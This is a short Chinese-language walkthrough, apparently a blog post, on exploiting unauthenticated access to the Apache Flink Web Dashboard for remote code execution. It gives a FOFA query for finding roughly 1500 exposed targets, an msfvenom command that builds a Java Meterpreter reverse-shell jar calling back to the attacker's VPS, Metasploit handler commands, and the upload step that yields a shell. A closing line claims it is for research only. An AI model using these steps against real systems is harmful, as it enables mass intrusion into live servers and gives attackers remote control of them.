一、漏洞危害
Apache Flink Web Dashboard 未授权访问,上传恶意jar导致远程代码命令执行漏洞复现
高危,能远程执行任意命令
利用fofa搜索本程序,关键词:app="Apache-Flink" ,接近1500台,初步尝试发现命中率较高。
访问出现此页面功能模块,证明可能存在漏洞
第一步:生成需要上传的jar包
msf监听:
>msfvenom -p java/meterpreter/reverse_tcp LHOST=VPS LPORT=VPS_PORT -f jar > rce.jar
第二步:监听端口
>use exploits/multi/handler
>set PAYLOAD java/meterpreter/reverse_tcp
>set LHOST your_ip
>exploit -j
第三步:上传文件,点击submit
上传之后点击submit
获取shell
执行命令
本文中提到的漏洞利用Poc和脚本仅供研究学习使用,请遵守《网络安全法》等相关法律法规。